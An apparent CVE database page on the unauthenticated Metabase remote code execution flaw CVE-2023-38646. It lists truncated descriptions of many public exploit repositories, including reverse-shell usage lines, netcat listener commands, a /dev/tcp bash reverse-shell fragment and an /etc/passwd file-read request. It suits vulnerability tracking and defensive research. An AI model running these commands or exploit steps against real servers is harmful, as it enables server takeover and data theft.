CVE-2023-38646

Published: 21/07/2023 Updated: 15/02/2024
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 0

Vulnerability Summary

Metabase open source prior to 0.46.6.1 and Metabase Enterprise prior to 1.46.6.1 allow malicious users to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

Vulnerable Product

metabase metabase

Mailing Lists

Metabase version 0.46.6 pre-authentication remote code execution exploit ...

Github Repositories

CVE-2023-38646 Unauthenticated RCE vulnerability in Metabase

CVE-2023-38646-exploit: "This vulnerability, designated as CVE-2023–38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication." A quick reverse shell exploit script for cve-2023-38646. I did not find this vulnerability, just made the script. Usage: root@box:~/CVE-2023-38646# python3 exploit.py

CVE-2023-38646 (Pre-Auth RCE in Metabase)

CVE-2023-38646 Overview Compile Usage Running CVE-2023-38646 Overview: Metabase is an open source business intelligence tool that lets you create charts and dashboards using data from a variety of databases and data sources. This vulnerability, designated as CVE-2023–38646, allowed attackers to execute arbitrary commands on the server without requiring any authenti

Metabase Pre-auth RCE

CVE-2023-38646 - Metabase Pre-auth RCE. Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2. PoC Steps: Navigate t

This is a script written in Python that allows the exploitation of Metabase's software security flaw described in CVE-2023-38646.

Metabase Pre-Auth RCE (CVE-2023-38646) POC. This is a script written in Python that allows the exploitation of Metabase's software security flaw described in CVE-2023-38646. The system is vulnerable in versions preceding 0.46.6.1, in the open-source edition, and preceding 1.46.6.1, in the enterprise edition. Usage: The script needs the target URL, the setup token

cve-2023-38646-metabase-ReverseShell. Run command: go run \CVE-2023-38646-metabase-ReverseShell.go -u target.com:targetPort -h Your VPS IPaddr -p NC listen Port. Note: when you input the target host, please do not forget the or

Automatic Tools For Metabase Exploit Known As CVE-2023-38646

CVE-2023-38646 Automatic Tools For Metabase RCE Exploit Known As CVE-2023-38646. Read secryme/explore/news/metabase-rce-cve-2023-38646/ for more information (POC, Dork). How to Use single.py: python3 single.py --url=127.0.0.1:8080 --command="curl subrequestcatchercom/some-endpoint" or python3 single.py -u http:/

For educational purposes only

For educational purposes only. Inspired by Assetnote research. CVE: CVE-2023-38646. CVSS: 9.8. Vendor link: click. Vulnerable version: Metabase Enterprise 1.46 < 1.46.6.1, Metabase Enterprise 1.45 < 1.45.4.1, Metabase Enterprise 1.44 < 1.44.7.1, Metabase Enterprise 1.43 < 1.43.7.2, Metabase open source 0.46 < 0.46.6.1, Metabase open source 0.45 <

Python script to exploit CVE-2023-38646 Metabase Pre-Auth RCE via SQL injection

CVE-2023-38646 Python script to exploit CVE-2023-38646 Metabase Pre-Auth RCE via SQL injection. The script will GET /api/session/properties to get the setup token and assess exploitability of the target. If it's vulnerable will then print the setup token, else it will quit after an error message. If the -x option is used and the target is vulnerable, it will use the provide

Metabase Pre-Auth RCE POC

Metabase Pre-Auth RCE POC - CVE-2023-38646. Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server. I have written the script directly to gain reverse shell on the attacker's machine. Usage: The script requires the Target URL, Attackers IP and Port. Providing the setup token is not required for

CVE-2023-38646 - Metabase Pre-Auth RCE ⚠️ For educational and authorized security research purposes only. Original Exploit Authors: Very grateful to the original PoC author securezeron. Step Guides: Set Up the Listener on your attacker machine: nc -nlvp 4444 Then, run this command: python3 CVE-2023-38646-Reverse-Shell.py -h python3

Exploit script for Pre-Auth RCE in Metabase (CVE-2023-38646)

Metabase Pre-Auth RCE (CVE-2023-38646) POC. This is a python script which exploits the remote code execution vulnerability of Metabase's login software. It allows us to execute arbitrary commands on the server before authentication. Vulnerable versions are Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1. Usage: python3 exploit.py -u URL -t TOKEN -

CVE-2023-38646 Metabase 0.46.6 exploit

CVE-2023-38646 CVE-2023-38646 Metabase 0.46.6 exploit. This tool exploits a vulnerability (CVE-2023-38646) in a software platform. The exploit allows for remote code execution via a crafted request, leveraging a mishandled database connection string. Overview: The tool: Fetches the setup token from the target URL; Base64 encodes the supplied command; Constructs the payload with

CVE-2023-38646-Poc usage: python check.py ip port. Vulnerable version: Metabase Enterprise 1.46 < 1.46.6.1, Metabase Enterprise 1.45 < 1.45.4.1, Metabase Enterprise 1.44 < 1.44.7.1, Metabase Enterprise 1.43 < 1.43.7.2, Metabase open source 0.46 < 0.46.6.1, Metabase open source 0.45 < v0.45.4.1, Metabase open source 0.44 < 0.44.7.1, Metabas

Metabase Pre-auth RCE (CVE-2023-38646)!!

CVE-2023-38646 Metabase Pre-auth RCE!! Usage Check Manual Exploitation POC: youtube/b51LPjD-uTo

Tools to exploit metabase CVE-2023-38646

Poc-Metabase-Preauth-CVE-2023-38646 How to use? λ cve git clone github.com/LazyySec/CVE-2023-38646.git λ cve cd Poc-Metabase-Preauth-CVE-2023-38646 λ Poc-Metabase-Preauth-CVE-2023-38646 git:(main) go build CVE-2023-38646-Exploit.go λ Poc-Metabase-Preauth-CVE-2023-38646 git:(main) ✗ go build Reverse-Shell.go λ Poc-Metabase-Preauth

Metabase postgres (org.h2.Driver) RCE without INIT

Extension of the Pre-Auth RCE in Metabase (CVE-2023-38646) explained here. This helped me to avoid errors related to "database already in use" (with H2 and postgre as engines). { "token": "TOKEN", "details": { "is_on_demand": false, "is_full_sync": false, "is_sample": false, "cache_ttl": null, "

Proof of Concept for CVE-2023-38646

CVE-2023-38646 Proof of Concept for CVE-2023-38646

Metabase Pre-Auth Remote Code Execution CVE-2023-38646. A proof-of-concept for CVE-2023-38646 Metabase Pre-Auth Remote Code Execution. Getting Started: Executing program With python3: python3 exploit.py -t metabaseurl/ -l 127.0.0.1 -p 1337 Help: For help menu: python3 exploit.py -h Acknowledgme

Remote Code Execution on Metabase CVE-2023-38646

🛡️ Exploit for CVE-2023-38646 🛡️ Welcome to this powerful exploit tool! It's designed specifically to test for the CVE-2023-38646 vulnerability in Metabase servers. 🚀 Installation 🚀 The journey begins with Python 3 and pip. Install them with the following command: sudo apt-get install python3 python3-pip Next, take off

CVE-2023-38646 PoC Description: This is a Proof of Concept (PoC) script for exploiting Metabase, an open-source business intelligence and data analytics tool. Metabase allows users to visualize and interact with their data, making it a powerful platform for data analysis. This vulnerability, designated as CVE-2023-38646, allowed attackers to execute arbitrary commands on the ser

POC for CVE-2023-38646

Metabase Pre Authentication RCE (CVE-2023-38646). We have provided two files: CVE-2023-38646-POC.py for checking if any metabase instance is leaking setup-token; CVE-2023-38646-Reverse-Shell.py to get a reverse shell on the attacker controlled machine. CVE-2023-38646-POC.py CVE-2023-38646-Reverse-Shell.py How To Use: git clone github.com/securezeron/CVE-2023-38646

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

CVE-2023-38646 (Metabase Pre-Auth RCE). Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2. Example usage: Open two

Code to detect/exploit vulnerable metabase application

CVE-2023-38646 Code to detect/exploit vulnerable metabase application

CVE-2023-38646-POC

CVE-2023-38646-POC CVE-2023-38646-POC

CVE-2023-38646 (Metabase PreAuth RCE) Description: Description of the vulnerability. What is Metabase: Metabase is an open source business intelligence tool. It lets you ask questions about your data, and displays answers in formats that make sense, whether that’s a bar graph or a detailed table. How to run the scanner: python scanne

Metabase Pre-auth RCE (CVE-2023-38646)

Metabase: Metabase is an open source business intelligence tool that lets you create charts and dashboards using data from a variety of databases and data sources. It’s a popular project, with over 33k stars on GitHub and has had quite a lot of scrutiny from a vulnerability research perspective in the last few years. CVE-2023-38646 - Metabase Pre-auth RCE: Metabase open sou

RCE Exploit for CVE-2023-38646

CVE-2023-38646 A python RCE exploit for CVE-2023-38646. Usage: Start a Listener: nc -lvnp <port> Run the exploit: python3 CVE-2023-38646.py -u <metabase_url> -l <local_ip> -p <local_port> Help: python3 CVE-2023-38646.py -h usage: CVE-2023-38646.py [-h

CVE-2023-38646 Metabase RCE

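MetabaseRceTools: CVE-2023-38646 Metabase RCE tool. A graphical exploitation tool for the CVE-2023-38646 RCE. Verification module: enter the target URL to detect an unauthenticated token. Command execution: this module can only be used after the verification module has been run to obtain the token. JarLocation: the location of metabase.jar, the current directory by default. Memory shell injection: currently only the cmd and godzilla modes have been written, controlled through x-client-data x-clie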

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

CVE-2023-38646 - Metabase RCE. Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2. Usage: $ python3 CVE-2023-38646p

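CVE-2023-38646 The original script comes from securezeron. During testing I found that the reverse shell generated by this poc, once base64-encoded, caused the exploit to fail because of the trailing '=' character. I made a small modification to it to solve this problem. # The original code that generates the reverse shell payload >>> base64b64encode("bash -i >&/dev/tcp/10101459/8080 0>&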

CVE-2023-38646 Pre-Auth RCE in Metabase

CVE-2023-38646 Fork of kh4sh3i's removing the need for Burp Collector. CVE-2023-38646 (Pre-Auth RCE in Metabase): Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. Usage: python3 CVE-2023-38646.py -u

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

CVE-2023-38646 Metabase Pre-Auth RCE (11/26/2023). Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2. The vulnerab

Analytics CVE-2023-38646 zhuanlan.zhihu.com/p/647355511 CVE-2021-3493 github.com/briskets/CVE-2021-3493

Analytics-htb-Rce #first clone the repository git clone github.com/securezeron/CVE-2023-38646 cd CVE-2023-38646 pip install -r requirements.txt python3 CVE-2023-38646-Reverse-Shell.py -h #the before run reverse shell start netcat listener and go back to run script as follows python3 CVE-2023-38646-Reverse-Shell.py --rhost {Target Ip address} --lhost {your ip-address} -

Exploits working {tested by me} for various scenarios

Exploit Collection: This is my curated collection of working exploits for various vulnerabilities. I will keep updating this repository with new and effective exploits. CVE-2023-38646 (Metabase) CVE ID: CVE-2023–38646 Description: This vulnerability allowed attackers to execute arbitrary commands on the Metabase server without requiring any authentication. Resolved in Met

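Disclaimer: Any direct or indirect consequences and losses caused by spreading or using the information provided in this article are the sole responsibility of the user, and the author assumes no responsibility for them. The tools involved come from the internet; test their safety yourself. Added August 16: Smart S85F arbitrary file read, FanRuan channel serialization, Weaver Ecology unauthorized access, Weaver Ecology OA front-end arbitrary SQL statement execution, HiKVISION integrated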

2023 HVV intelligence express~

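Disclaimer: Any direct or indirect consequences and losses caused by spreading or using the information provided in this article are the sole responsibility of the user, and the author assumes no responsibility for them. The tools involved come from the internet; test their safety yourself. Added August 22: QQ desktop client remote execution, ZenTao 180~183 backstage command injection, Lenovo network disk arbitrary file upload vulnerability, Qiwang Manufacturing ERP comboxsto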

Research analysis

Research—By Goby A_shortcut_to_vulnerability_debugging:_streamlining_code_to_speed_up_analysis_and_exploitation In order to facilitate debugging and quickly reproduce the vulnerability, this article attempts to simulate the main logic flow of the vulnerability by using only part of the unit code for dynamic debugging analysis The_story_behind_counterin

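I. 2023 HW vulnerability POC/EXP and intelligence summary knowledge base. 1 1Panel backend arbitrary file read vulnerability. Vulnerability description: The 1Panel backend has an arbitrary file read vulnerability through which an attacker can obtain sensitive information files on the server. POST /api/v1/file/loadfile {"paht":"/etc/passwd"} 2 360 New Tianqing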

Embark on my CTFs Journey, where I document my conquests and lessons learned while navigating the dynamic challenges of Capture The Flag contests. From cracking codes to outsmarting puzzles, join me in exploring the diverse landscape of cybersecurity challenges.

Description: Welcome to my personal Capture The Flags (CTFs) repository! This repository is created to track my progress, achievements, and detailed notes regarding cybersecurity challenges, especially on popular platforms like TryHackMe, Hack The Box and Rootme. Contents: This repository contains an organized list of CTF Machines that I have successfully exploited. Each entry in

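Batch-scanning PoCs and exploits for various vulnerabilities, covering unauthorized access, RCE, file upload, SQL injection, information disclosure and more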

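HAC_Bored_Writing: Batch-scanning PoCs and exploits for various unauthorized access, RCE, file upload, SQL injection and information disclosure vulnerabilities, updated in real time to track the latest vulnerabilities. For now the previously written ones have been merged together; for later additions a timeline will be added at the very bottom, and those who want the latest PoCs and exploits can choose according to the timeline. 2023: Huaxia ERP QVD-2023-32275 sensitive information disclosure, Landray EIS saveIm file upload, Yonyou U8-Cloud uplo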

CVE Exploit PoC's

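CVE-2023-21752: PoC for the arbitrary file delete vulnerability in the Windows Backup service. CVE-2023-29343: PoC for the arbitrary file write bug in Sysmon version 1414. CVE-2023-36874: This vulnerability applies to vulnerable Windows clients/servers. Compile the code and create the c:\test\system32 directory. Put wermgr.exe into that directory and run the compiled PoC. CVE-2023-20178: Cisco Secure Client (in 5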

Linux based vulnerabilities (CVE) exploit detection through runtime security using Falco/Osquery/Yara/Sigma

Linux-Exploit-Detection: Linux-based vulnerabilities (CVE) exploit detection through runtime security using Falco/Osquery/Yara/Rego/Sigma. This is an experimental project to evaluate possible ways to detect exploits (CVE) in a Linux environment (HOST/Container/Cloud) using ebpf based - Falco Runtime Security Analytic + Memory based - Osquery + Yara Policy based - Rego + OPA/ Aqu

PoC. Severity critical.

PoC. Severity critical. 2023 F5 BIG-IP Configuration utility unauthenticated remote code execution vulnerability CVE-2023-46747 CVSSv3 Score 9.8 Vulnerability description: This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. There is no data

A CVE vulnerability alert knowledge base, no exp/poc

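CVE [Disclaimer] The techniques, ideas and tools covered in this repository are for security research only. No one may use them for unauthorized penetration testing, or for illegal purposes or profit; otherwise you bear the consequences yourself. No exp/poc; some entries include remediation. 0x01 Project navigation 202212 CVE-2022-3328: Snapd local privilege escalation vulnerability advisory CVE-2022-41080 41082: Microsoft Exchange Ser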

PoC collection, n-day exploits for frameworks

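FrameVul. General: a summary of some offensive vulnerabilities from mainstream vendors; 2021_Hvv vulnerabilities; CVE vulnerabilities in Java applications in 2022; vulnerability library collection; public information, exploits and scripts; Goby POC; nuclei-templates; LiqunKit_; a vulnerability-scanning PoC library that enhances fscan; quickly detect high-risk vulnerabilities in common middleware and components during penetration testing. OAExploit, a product-based one-click scanning tool; batch scanning and cracking of Hikvision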

A Vulhub vulnerability reproduction knowledge base

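Vulhub-Reproduce [Disclaimer] The techniques, ideas and tools covered in this project are for learning only. No one may use them for illegal purposes or profit, or for unauthorized penetration testing; otherwise you bear the consequences yourself, and this project is not involved. Please read the laws and regulations before using this project. Vulhub vulnerability reproduction, updated irregularly. Thanks to @Vulhub for providing the open source vulnerability range. 0x01 Project navigation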

bounty collection

Contents bounty targets data data components hk1 node modules DbCache Resources for Beginner Bug Bounty Hunters assets javasec study BruteX wordlists loot kalitools Web Applications Hardware Hacking Sniffing Spoofing Vulnerability Analysis Wireless Attacks Forensics Tools image Password Attacks Reverse Engineering Exploitation Tools Information Gathering Reporting Tools Galax

A vulnerability PoC knowledge base

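Awesome-POC [Disclaimer] The techniques, ideas and tools covered in this project are for learning only. No one may use them for illegal purposes or profit, or for unauthorized penetration testing; otherwise you bear the consequences yourself, and this project is not involved. Please read the laws and regulations before using this project. 0x01 Project navigation CHECKLIST Nacos vulnerability Checklist SmartBi vulnerability Checklist Security appliance vulnerability Chec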

📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.

PoC in GitHub 2023 CVE-2023-0045 (2023-04-25) The current implementation of the prctl syscall does not issue an IBPB immediately during the syscall. The ib_prctl_set function updates the Thread Information Flags (TIFs) for the task and updates the SPEC_CTRL MSR on the function __speculation_ctrl_update, but the IBPB is only issued on the next schedule, when the TIF bi

One-command to detect all remotely exploitable KEV vulnerability. Sourced from CISA KEV, Google's Tsunami and Ostorlab's Asteroid.

Known Exploited Vulnerabilities Detector. Introduction: This project is dedicated to the detection of known exploited vulnerabilities. Our goal is to provide a single command to detect all of these vulnerabilities. Requirements: Docker is required to run scans locally. To install docker, please follow these instructions. Installing: Ostorlab ships as a Python package on pypi. To in